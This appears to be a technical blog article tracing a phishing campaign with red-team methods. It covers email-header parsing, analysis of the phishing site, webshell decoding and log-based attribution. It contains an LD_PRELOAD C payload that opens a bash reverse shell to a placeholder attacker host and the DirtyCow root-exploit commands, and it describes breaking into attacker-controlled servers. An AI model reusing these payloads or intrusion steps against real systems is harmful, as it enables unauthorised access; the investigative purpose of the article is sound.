How Red Team Techniques Uncover Phishing Attack Origins: A Step‑by‑Step Guide

This article demonstrates how red‑team methods can be applied to phishing traceability, detailing phishing classifications, email‑header extraction, malicious site analysis, web‑shell decryption, privilege‑escalation techniques, log mining, and attacker attribution to reconstruct the full attack chain.

Huolala Tech

Introduction

Statistics show that about 92% of data‑leak incidents involve social‑engineering and phishing attacks, which have become the primary entry point for APT campaigns. Attackers lure victims to click malicious links or open infected attachments to steal credentials and later compromise corporate networks.

Phishing Classification

By attack method:
• Mass‑mail phishing – broad‑scale credential harvesting.
• Spear‑phishing – targeted, highly crafted emails, often used in APT attacks.

By email content:
• Malicious links (fake login pages, compromised file downloads).
• Malicious attachments (Office macros, disguised executables).
• 0‑day/N‑day exploits targeting browsers, Office, or PDF readers.

Information Collection

Red‑team operators often use compromised “zombie” servers as infrastructure (jump proxies, mail servers, fake phishing sites). Understanding common mail‑header fields is essential for tracing.

(1) Received: routing information
(2) Date: creation time of the email
(3) From: author (can be spoofed)
(4) To: recipient address
(5) CC: carbon copy
(6) BCC: blind carbon copy
(7) Subject: email subject
(8) Sender: actual SMTP sender
(9) Reply-To: reply address
(10) MIME-Version
(11) Content-Type
(12) Return-Path

Email Sample Analysis

A real‑world example of a Microsoft Outlook WebApp password‑expiry phishing email is shown below.

The email was exported as an .eml file; its header and body reveal the attacker’s infrastructure.

```text
// Email header
Received: from sysmailout1.platon.sk (85.248.228.17)
X-QQ-SPAM: true
...
Subject: =?UTF-8?Q?Password_expiry_notice?=
From: =?UTF-8?Q?Microsoft_Online_Services_Team?=

// Email body (truncated)
The password for the Microsoft 365 account [email protected] has expired.
Please <a href="http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@cn">change your password</a> immediately.
```
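The header fields listed above and this sample can be pulled apart mechanically. The following is an added example (not the article's own tooling): it parses a constructed .eml modelled on the sample, walks the Received chain back to the originating host, compares the branded display name with the domains that actually carried the mail, and lists the links in the body. The victim mailbox names and the `sender.example` addresses are made up; the sending host, IP and link are the ones quoted on the page.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed .eml modelled on the OWA password-expiry sample above; the sending
# host and the link are the ones quoted on the page, the addresses are made up.
SAMPLE_EML = """\
Received: from mx.victim.example (mx.victim.example [192.0.2.10])
\tby mail.victim.example with ESMTP; Tue, 01 Jan 2019 10:00:02 +0000
Received: from sysmailout1.platon.sk (85.248.228.17)
\tby mx.victim.example with ESMTP; Tue, 01 Jan 2019 10:00:01 +0000
Return-Path: <bounce@sender.example>
From: =?UTF-8?Q?Microsoft_Online_Services_Team?= <alerts@sender.example>
To: user@victim.example
Subject: =?UTF-8?Q?Password_expiry_notice?=
Content-Type: text/html; charset=utf-8

<p>Please <a href="http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@cn">change your password</a> now.</p>
"""

FROM_HOST = re.compile(r"\bfrom\s+(\S+)", re.I)
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

def parse_eml(raw: str):
    return message_from_string(raw, policy=policy.default)

def received_chain(msg):
    """Hops oldest-first. Each relay prepends its own Received: line, so the
    last one in the file is the hop nearest the true origin."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = str(value)
        host, ip = FROM_HOST.search(value), IPV4.search(value)
        hops.append({"from": host.group(1) if host else None,
                     "ip": ip.group(1) if ip else None})
    return hops

def sender_mismatch(msg):
    """Brand in the display name vs. the domains that actually carried the mail."""
    display, addr = parseaddr(str(msg["From"]))
    ret_addr = parseaddr(str(msg.get("Return-Path", "")))[1]
    from_dom = addr.rpartition("@")[2].lower()
    return {"display": display, "from_domain": from_dom,
            "return_path_domain": ret_addr.rpartition("@")[2].lower(),
            "brand_mismatch": "microsoft" in display.lower()
                              and "microsoft" not in from_dom}

def extract_links(msg):
    """Every href in the (HTML or plain) body: the landing pages to pivot on."""
    body = msg.get_body(preferencelist=("html", "plain"))
    return re.findall(r'href="([^"]+)"', body.get_content() if body else "")
```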

Phishing Site Vulnerability Analysis

The malicious site www.rosturplast.com mimics an OWA password‑reset page. Whatever password is submitted, the site answers with an error page: a smoke screen that prompts victims to retry and hand over their real credentials. The site runs Joomla 3.3.3; it was scanned for CVE‑2016‑9838, but that vulnerability had already been patched.

Further leads for examining the host include directory brute‑forcing, enumerating other sites hosted on the same server, and scanning the surrounding /24 (C‑segment) range.

```text
[+] HOST: www.rosturplast.com (137.74.81.5 – France)
[+] OS: Red Hat 4.8
[+] Web Server: Apache/2.4.6 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
[+] CMS: Joomla 3.3.3
```

Webshell Decryption and Privilege Escalation

The attacker’s encrypted webshell config.php on www.mirohaviar.sk was decoded through a series of base64 and hex transformations, ultimately revealing the clear‑text payload.

```bash
# Peel one layer at a time: take the quoted string, base64-decode it, take the
# next quoted string, strip the \x hex escapes, turn the hex back into bytes,
# base64-decode again, and keep going until clear-text PHP appears.
awk -F '"' '{print $2}' config.php | base64 -d -i | awk -F '"' '{print $2}' \
  | sed 's/\\x//g' | tr -d '\\' | xxd -r -p | base64 -d -i | ... (repeat)
```
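The same peeling can be automated so the analyst gets every intermediate layer for the report. The block below is an added example, not the article's script: it builds a constructed stand-in for config.php (plaintext wrapped in base64, then `\x` hex escapes, then base64 again) and strips the layers until nothing decodes any further. The sample file contents and layer order are assumptions, not the real webshell.

```python
import base64
import re

QUOTED = re.compile(r'"([^"]*)"')              # awk -F '"' '{print $2}'
HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')   # sed 's/\\x//g' | xxd -r -p

def _printable(raw: bytes) -> bool:
    """A decoded layer must still be readable text, otherwise we peeled too far."""
    return bool(raw) and all(32 <= b < 127 or b in (9, 10, 13) for b in raw)

def peel_layer(text: str):
    """Undo one layer (quoted base64 or quoted \\x-hex); None when neither applies."""
    m = QUOTED.search(text)
    inner = m.group(1) if m else text.strip()
    if not inner:
        return None
    if HEX_ESC.search(inner):
        raw = bytes.fromhex("".join(HEX_ESC.findall(inner)))
    else:
        try:
            raw = base64.b64decode(inner, validate=True)
        except ValueError:          # not base64: this is the clear-text layer
            return None
    return raw.decode("ascii") if _printable(raw) else None

def decode_layers(text: str, max_layers: int = 20):
    """Repeat until nothing peels off; every intermediate layer is kept."""
    layers = [text]
    while len(layers) <= max_layers:
        nxt = peel_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers

def build_sample() -> str:
    """Constructed stand-in for the page's config.php: plaintext wrapped in
    base64, then \\x-hex, then base64 again. Not the real file."""
    plain = '<?php echo "decoded"; ?>'
    l1 = base64.b64encode(plain.encode()).decode()
    l2 = "".join(f"\\x{b:02x}" for b in f'$a = "{l1}";'.encode())
    l3 = base64.b64encode(f'$b = "{l2}";'.encode()).decode()
    return f'<?php $c = "{l3}"; ?>'
```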

To bypass disable_functions and open_basedir, an LD_PRELOAD shared library was crafted to hijack geteuid() and execute a reverse shell.

```c
// LD_PRELOAD library from the article; ATTACKER_IP is the page's placeholder
#include <stdlib.h>

void payload() {
    system("bash -i >& /dev/tcp/ATTACKER_IP/999 0>&1");
}

// Hijacked libc call: runs once, then drops the hook so child processes are clean
int geteuid() {
    if (getenv("LD_PRELOAD") == NULL) return 0;
    unsetenv("LD_PRELOAD");
    payload();
    return 0;
}
```

Log Analysis and Attacker Attribution

Web‑access logs were parsed to extract frequent IPs contacting the malicious scripts. Geo‑IP lookup revealed origins in the United States, Nigeria, Romania, Norway, Italy, and other countries.

```bash
# Requests for PHP scripts under the phishing-kit directory, ranked by source IP
grep -h "/shells/" * | grep php | awk '{print $1}' | sort | uniq -c | sort -nr
```
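For a defender doing the same triage on a seized or mirrored kit, the following is an added example (not the article's pipeline) that parses Apache combined-log lines, keeps only PHP requests under the `/shells/` directory, ranks source IPs for geo-IP lookup and records each IP's first and last hit. The log lines are constructed; the client addresses are documentation ranges, not the real visitors.

```python
import re
from collections import Counter

# Constructed Apache combined-log lines; the /shells/ kit path comes from the page,
# the client addresses are documentation ranges, not the real visitors.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jan/2019:08:12:01 +0000] "GET /shells/logon.secureaccess/?ml=test@cn HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2019:08:12:09 +0000] "POST /shells/logon.secureaccess/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.44 - - [03/Jan/2019:08:15:30 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.44 - - [03/Jan/2019:08:16:02 +0000] "GET /shells/logon.secureaccess/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.99 - - [03/Jan/2019:09:01:00 +0000] "POST /shells/admin.php HTTP/1.1" 200 12 "-" "curl/7.64.0"
192.0.2.99 - - [03/Jan/2019:09:01:30 +0000] "POST /shells/admin.php HTTP/1.1" 200 44 "-" "curl/7.64.0"
192.0.2.99 - - [03/Jan/2019:09:02:00 +0000] "GET /shells/admin.php HTTP/1.1" 200 20 "-" "curl/7.64.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def kit_hits(lines, marker="/shells/", ext=".php"):
    """Requests for PHP scripts under the kit directory (grep "/shells/" | grep php)."""
    recs = (parse_line(l) for l in lines)
    return [r for r in recs if r and marker in r["path"] and ext in r["path"]]

def top_sources(lines, **kw):
    """Source IPs ranked by hit count (sort | uniq -c | sort -nr), ready for geo-IP."""
    return Counter(r["ip"] for r in kit_hits(lines, **kw)).most_common()

def activity_window(lines, **kw):
    """First and last hit per IP (log assumed chronological) to correlate with other hosts."""
    window = {}
    for r in kit_hits(lines, **kw):
        first = window.get(r["ip"], (r["ts"],))[0]
        window[r["ip"]] = (first, r["ts"])
    return window
```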

Google hacking (search‑operator queries) turned up cached snapshots of since‑deleted back doors, confirming the involvement of the group “Muslim Cyber Corp – Mujahidin Cyber Army – Family Attack Cyber”.

Puppet Server Vulnerability Analysis

The puppet server 187.85.134.4 (Brazil) runs Apache/2.2.22 with PHP 5.3.10. Scanning revealed an outdated ProFTPD version with a known vulnerability that could be used to upload a webshell.

```text
[+] HOST: 187.85.134.4 (Brazil)
[+] OS: Ubuntu
[+] Web Server: Apache/2.2.22 PHP/5.3.10
```

The server stores massive email address lists (≈624 000 entries) for phishing campaigns and holds Perl scripts for mass mailing, DDoS tools, and cryptomining back‑doors.

Privilege Escalation on Linux

Local kernel exploits (CVE‑2013‑2094, CVE‑2013‑1763) failed because of missing dependencies, but the DirtyCow exploit (CVE‑2016‑5195) succeeded, granting root on the puppet server.

```bash
gcc -Wall -o dirtycow dirtycow.c -ldl -lpthread
./dirtycow   # escalates to root
```

Information Summary

Victim distribution heat‑maps show most targets in Europe and Asia. The identified hacker group originates from Palestine, with known aliases such as Hawk_B404, MR.S1NS_Y, and others. Their public footprints include a blog and a Facebook page.

Attack Path Reconstruction

Combining all of the evidence (email headers, malicious‑site analysis, web‑shell decryption, log mining, and privilege escalation) allows a complete reconstruction of the attack chain and provides valuable intelligence for incident responders and law enforcement.
